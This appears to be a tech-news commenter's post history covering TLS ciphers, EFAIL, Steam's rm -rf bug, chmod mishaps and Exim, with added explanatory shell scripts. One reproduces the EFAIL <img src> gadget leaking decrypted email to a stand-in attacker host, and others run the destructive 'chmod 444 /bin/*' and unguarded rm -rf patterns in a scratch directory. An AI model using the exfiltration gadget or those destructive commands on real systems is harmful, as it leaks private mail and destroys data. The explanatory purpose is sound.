Posts by Alan J. Wylie
645 publicly visible posts • joined 21 Aug 2009
Git365. Git for Teams. Quatermass and the Git Pit. GitHub simply won't do now Microsoft has it
Happy birthday, you lumbering MS-DOS-based mess: Windows 98 turns 20 today
Active Desktop, which allowed HTML content (such as news headlines) to be shown on the user's desktop at the cost of prodigious amounts of CPU and RAM.
And bandwidth. I can remember one cow-orker enabling it, which rapidly became apparent when we looked at the ISDN logs and discovered that his desktop, left on overnight, had been connecting every few minutes, bringing the line up over and over again, incurring a call charge every time.
UK footie fans furious as Sky Broadband goes TITSUP: Total inability to stream unfair penalties
Seems to have affected Zen Internet too
Routing & Core Network Loss of Resilience
They seem to have had redundancy and no outage.
One update of interest:
Engineers are continuing to work on the fibre break.
The work is currently being delayed by numerous road works.
It's time for TLS 1.0 and 1.1 to die (die, die)
Not only do they only support TLS1.0, but including RC4-SHA in their cipher list? Really?
Supported Server Cipher(s):
Preferred TLSv1.0 128 bits AES128-SHA
Accepted TLSv1.0 256 bits AES256-SHA
Accepted TLSv1.0 128 bits RC4-SHA
Accepted TLSv1.0 112 bits DES-CBC3-SHA
Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
Accepted TLSv1.0 128 bits RC4-MD5
User spent 20 minutes trying to move mouse cursor, without success
Sun optical mice, circa 1985
How many here remember the optical mice on early '80s Sun workstations?
There was a special mouse pad with horizontal and vertical lines on it.
New York State is trying to ban 'deepfakes' and Hollywood isn't happy
Re: Bullshit
So crafting a “digital replica” for films, adverts, musicals, for commercial purposes or without explicit written consent is violation of an individual’s rights."
And what about Woody Allen's Zelig and Dead Men Don't Wear Plaid?
Void Linux gave itself to the void, Korora needs a long siesta – life is hard for small distros
PGP and S/MIME decryptors can leak plaintext from emails, says infosec professor
Re: It seems it's a vul'n in HTML parsing in some clients
The first of two (!) attacks does seem rather simple. Send email with three MIME parts: 1. <img src="http://yourserver.com/ " 2. [PGP encrypted content] 3. "> Mail client decrypts 2, concatenates three parts and does lookup on the URL which you control.
It seems it's a vul'n in HTML parsing in some clients
http://seclists.org/oss-sec/2018/q2/104
https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
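The direct-exfiltration attack described in the reply above, simulated as an added example (it is not code from the post, the paper or any mail client). The PGP step is replaced by a stand-in that returns a constructed secret, and attacker.example is a placeholder for the server the attacker controls.

```shell
#!/bin/sh
# Added example: the "three MIME parts" gadget from the post above, without real
# PGP. SECRET and ATTACKER are constructed placeholders.
SECRET='meet at the usual place at 9'
ATTACKER='http://attacker.example/'

# Stand-in for the mail client's decryption step. A real client would run gpg
# over part 2 and splice the plaintext in; here it just returns the secret.
decrypt_part() { printf '%s' "$SECRET"; }

# The two attacker-supplied parts: part 1 opens an <img> tag and leaves its
# src attribute unterminated, part 3 closes it. Part 2 is the victim's ciphertext.
PART1='<img src="'"$ATTACKER"
PART3='">'

# Vulnerable client: decrypt, then concatenate all parts into one HTML document.
render_concatenated() { printf '%s%s%s' "$PART1" "$(decrypt_part)" "$PART3"; }

# extract_img_src HTML -> the URL an HTML renderer would fetch, or nothing
# (a real client would percent-encode the spaces; the plaintext still leaks)
extract_img_src() { printf '%s' "$1" | sed -n 's/.*<img src="\([^"]*\)".*/\1/p'; }

# Hardened client: render each MIME part as its own document, so a tag opened
# in part 1 cannot swallow part 2. Prints every URL fetched across the parts.
render_isolated() {
    for part in "$PART1" "$(decrypt_part)" "$PART3"; do
        extract_img_src "$part"
    done
}

echo "concatenated client fetches: $(extract_img_src "$(render_concatenated)")"
echo "isolated client fetches:     [$(render_isolated)]"
```

The fix the second function shows is the structural one: never let markup from one MIME part continue into another. Disabling remote content loading in the client closes the img route but not other exfiltration channels, which is why the advisories linked above recommend both.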
T-Mobile owner sends in legal heavies to lean on small Brit biz over use of 'trademarked' magenta
We need a crowd-sourced distributed binary (hexagonal?) chop on the RGB triplets to find out exactly where the lawyers stop alleging that a particular shade infringes. We can then mock them mercilessly for claiming that one shade of magenta is OK and an indistinguishable one a fraction away in colour space doesn't.
UK age-checking smut overlord won't be able to handle the pressure – critics
US military base stores pull Huawei, ZTE kit off the shelves
Today's NCSC advice
ZTE: NCSC advice to select telecommunications operators with national security concerns
The NCSC has issued advice to a limited number of UK telecommunications operators regarding the potential use of ZTE equipment and services. ... NCSC assess that the national security risks arising from the use of ZTE equipment or services within the context of the existing UK telecommunications infrastructure cannot be mitigated
GitLab crawling back online after breaking its brain in two
gitlab vulnerabilities disclosed
I wonder whether the problem was as a result of these vulnerabilities being patched:
https://twitter.com/jobertabma/status/989708798515265539
Jobert Abma, 4:32 am - 27 Apr 2018
In December I found a number bugs in @gitlab, all of which were disclosed today. The team responded swiftly and professionally and is a pleasure to work with. I'll describe each vulnerability in a separate tweet in this thread. Enjoy them and happy hacking!
ISO blocks NSA's latest IoT encryption systems amid murky tales of backdoors and bullying
The ciphers look as if they will remain in the Linux kernel
http://lists.infradead.org/pipermail/linux-arm-kernel/2018-April/573548.html
Eric Biggers points out that there is no alternative block cipher suitable for low power processors to support dm-crypt or fscrypt filesystem encryption, and the alternative is no encryption at all.
Bruce Schneier's opinion is Personally, I doubt that they're backdoored
TSB outage, day 5: What do you mean you can't log in? Our systems are up and running. Up and running, we say!
loading failed for script
https://pbs.twimg.com/media/DbiPvH7WsAAj3Iu.jpg
"Loading failed for the <script> with the source "https://dpm.demdex.net/"...
"Loading failed for the <script> with the source "https://visitor-service.tealiumiq.com/"...
What on earth are these doing on a supposedly secure page?
The tech you're reading these words on – you have two Dundee uni boffins to thank for that
Re: Spear
Otto Frisch too, who founded Laser-Scan, which worked with RSRE on liquid crystal displays (see my earlier post).
RSRE and Laser-Scan
RSRE (as it had become by the early 80's) and Laser-Scan in Cambridge worked on an alternative to individually driven LCD pixels, by drawing vector graphics using an infra-red laser to switch the phase of the LCD.
Reference to 1984 paper: Laser-Addressed Liquid Crystal Displays
I can still remember the goggles, locked doors and notice: "Do not stare into laser beam with remaining eye".
Yahoo! fined! $35m! for! covering! up! massive! IT! security! screwup!
Re: How about fining BT for also failing to disclose the breach.
I would have thought that when BT contracted with Yahoo! to handle their customers' emails, there would have been self-congratulatory press releases on the subject, perhaps naming the muppets who at the time took the credit.
Can I find these anywhere using Google? Not a trace. The "Right to be forgotten" strikes again?
Good news: AI could solve the pension crisis – by triggering a nuclear apocalypse by 2040
AWS DNS network hijack turns MyEtherWallet into ThievesEtherWallet
Internet Engineering Task Force leaves home, gets own bank account
Infosec brainiacs release public dataset to classify new malware using AI
Boffins pull off quantum leap in true random number generation
Re: what about
It's not only got to be genuinely random (as John von Neumann said: "Any one who considers arithmetical methods of producing random digits is, of course, in a state of sin"), but if someone else has generated the randomness you are using for your Certificate Signing Request, you cannot guarantee the security of your website ever after.
Imagine you're having a CT scan and malware alters the radiation levels – it's doable
Re: Assumption is the mother of all fuck-ups:
"A naive assumption is often made that reusing software ... will increase safety because the software will have been exercised extensively. Reusing software modules does not guarantee safety in the new system to which they are transferred...
As demonstrated by the Ariane 5 Launch Failure
Descent of the Machines: Aussie firm boasts of underwater drone swarms
not just submarines
more or less exclusively focused on detecting submarines
Mine hunting too. Many years ago I was a contractor at Ferranti, just before they went tits-up as a result of a massive fraud. Simulating sea-bed reflections for a Type 2093 sonar, also graphics for the camera on a ROV ("yellow submarine"). Massive (for those days) Silicon Graphics Onyx / R4400.
Cinema voucher-pusher tells customers: Cancel your credit cards, we've been 'attacked'
This was public back at the start of February
I saw a report about this and sent an e-mail containing the following link reporting a Filmology breach on 01-Feb-2018.
Digital air traffic control upgrade puts potential delays on London flights
Britain's 4G is slower than Armenia's
Super Cali goes ballistic, Starbucks is on notice: Expensive milky coffee is something quite cancerous
They'll be coming for our toast and chips next!
Microsoft loves Linux so much it wants someone else to build distros for its Windows Store
Seeing all the down votes, it prompted me to try and remember what it was that MS did almost 20 years ago to try and abuse the standards procedures. I was most amused to discover that googling for microsoft kerberos "nda" returns, as the top result, Embrace, extend, and extinguish
Manchester Arena attack: National Mutual Aid Telephony system failed
How do you make those darn code monkeys do what you want? Just give 'em a little nudge
Beware of the leopard
Make Things Easy / Politicians
The antithesis to this is if you don't want someone to do something, e.g. claim a tax refund, you make it as discouraging as possible.
Web forms that show you the new question only after you have answered the previous one, so you have to keep bothering the same person over and over again for the next answer.
Confusing instructions on web forms.
Long phone calls on hold with irritating music.
Being referred from one phone number to another.
That was my morning just wasted, and I'm sure that the Sir Humphreys of this world have big smug grins on their faces.
Fancy a viaduct? We have a wrought Victorian iron marvel to sell you
The Great McGonagall
Almost as bad as the Vogons'.
Beautiful Railway Bridge of the Silv’ry Tay!
Alas! I am very sorry to say
That ninety lives have been taken away
On the last Sabbath day of 1879,
Which will be remember’d for a very long time.
Take that, com-raid: US Treasury slaps financial sanctions on Russians for cyber-shenanigans, 2016 election meddling
MailChimp 'working' to stop hackers flinging malware-laced spam from accounts
I've been getting them: 10 in the past month, two only yesterday. I'd just blacklist their IPs but Let's Encrypt use them (mandrill.com / mandrillapp.com / mcsv.net / ROCKET SCIENCE GROUP are all MailChimp aliases).
List of delivery IPs here: https://mailchimp.com/about/ips/
Bad blood: Theranos CEO charged with massive fraud
"Innovators who seek to revolutionize and disrupt an industry must tell investors the truth about what their technology can do today, not just what they hope it might do someday."
Magic Leap are you listening?
Privacy folk raise alarm over schools snooping on kids' online habits
In 2003 I was working on web proxies for schools: Squid + DansGuardian plus a lot of customisation to allow teachers to turn all internet access on and off, allow only white-listed sites tailored for that particular lesson and block sites on demand. I'd hope that 100% of schools would have some sort of web filtering system.
In those days of limited bandwidth we even had an option to pre-load the Squid cache before the lesson started.
Tracking individual children, however, is a different matter.
Developer mistakenly deleted data - so thoroughly nobody could pin it on him!
That was heroic and ingenious.
My rescue mission to get the system back to normal after someone had typed chmod 444 /bin/* involved an 8" floppy and driving from Keighley to Peterborough (about 140 miles) and back.
One moral of the story, which I am still trying to instil into my cow-orkers 30 years later, is use the symbolic modes to add or subtract explicit permissions.
And for today:
X-Clacks-Overhead: GNU Terry Pratchett
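An added example (not from the post above) showing the difference the poster is getting at: an absolute mode replaces every permission bit, a symbolic mode only adds or subtracts the ones you name. It runs in a scratch directory with one fake binary, not in /bin.

```shell
#!/bin/sh
# Added example: why "chmod 444 /bin/*" breaks a system and "chmod a-w" does not.
# Everything happens under a mktemp directory; nothing on the host is changed.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir "$WORK/bin"
printf '#!/bin/sh\necho hello\n' > "$WORK/bin/hello"
chmod 755 "$WORK/bin/hello"

# mode_of FILE -> octal permission bits, e.g. 755 (GNU stat first, BSD fallback)
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# absolute_readonly DIR -> mode of DIR/hello after the post's command.
# 444 is an absolute mode: it *replaces* every bit, so the execute bits go and
# nothing in DIR can be run any more (on a real /bin, not even chmod itself).
absolute_readonly() { chmod 444 "$1"/*; mode_of "$1/hello"; }

# symbolic_readonly DIR -> mode of DIR/hello after the symbolic form.
# a-w only *subtracts* the write bits; read and execute are left as they were.
symbolic_readonly() { chmod a-w "$1"/*; mode_of "$1/hello"; }

# runnable FILE -> succeeds if the file is still executable
runnable() { [ -x "$1" ]; }

echo "after chmod a-w: $(symbolic_readonly "$WORK/bin")"   # 555, still runs
echo "after chmod 444: $(absolute_readonly "$WORK/bin")"   # 444, no longer runs
```

The same rule applies to adding permissions: chmod u+x touches one bit, whereas chmod 755 silently strips any setgid, sticky or group-write bit the file already had.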
Two years ago
Valve Steam CLEANS Linux PCs (if you're not careful)
Dodgy shell script triggers classic rm -rf /
rm -rf "$STEAMROOT/"*
But STEAMROOT had not been set
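An added example (not Valve's script) of what that glob expands to when the variable is empty, and of the two shell guards that stop it. The paths are printed rather than deleted, except in the last function, which only deletes under the guard and is pointed at a scratch directory.

```shell
#!/bin/sh
# Added example: the "$STEAMROOT/"* pattern with an empty variable, and how
# set -u and ${VAR:?} differ in catching it. Runs under a mktemp directory.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/steam/pkg" "$WORK/elsewhere"

# The original pattern with rm replaced by printf: lists what rm -rf would hit.
# With STEAMROOT empty, "$STEAMROOT/"* is "/"* and the list is the root directory.
expands_to() { printf '%s\n' "$STEAMROOT/"*; }

# Guard 1: set -u. Fails on an *unset* variable, but an empty one passes, which
# is exactly the Steam case: the assignment ran, failed, and left it empty.
expands_with_set_u() { ( set -u; printf '%s\n' "$STEAMROOT/"* ); }

# Guard 2: ${VAR:?msg}. Fails on unset *and* empty, so this is the one to use.
expands_with_check() { ( printf '%s\n' "${STEAMROOT:?STEAMROOT unset or empty}/"* ); }

# The guarded delete itself, for when STEAMROOT really does point somewhere.
safe_clean() { ( rm -rf "${STEAMROOT:?STEAMROOT unset or empty}/"* ); }

STEAMROOT=
echo "empty STEAMROOT, unguarded, first victim: $(expands_to | head -n 1)"
echo "empty STEAMROOT, set -u, first victim:    $(expands_with_set_u | head -n 1)"
expands_with_check 2>&1 || echo "empty STEAMROOT, :? guard: refused"
```

The subshells around the guarded forms are there so a failed check returns a non-zero status to the caller instead of terminating the whole script, which is what an unguarded ${VAR:?} does in a non-interactive shell.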
Buffer overflow in Unix mailer Exim imperils 400,000 email servers
The bug was reported to the Exim team on Monday
The bug was reported to the Exim maintainers on the 5th February, then under an NDA to distros and cloud services. What has just happened is that Mel has released more (but not full) details. There's no public POC either.
There was a bit of a panic when one distro broke the embargo and the patch became public a few days early, on a Friday of all days in the week.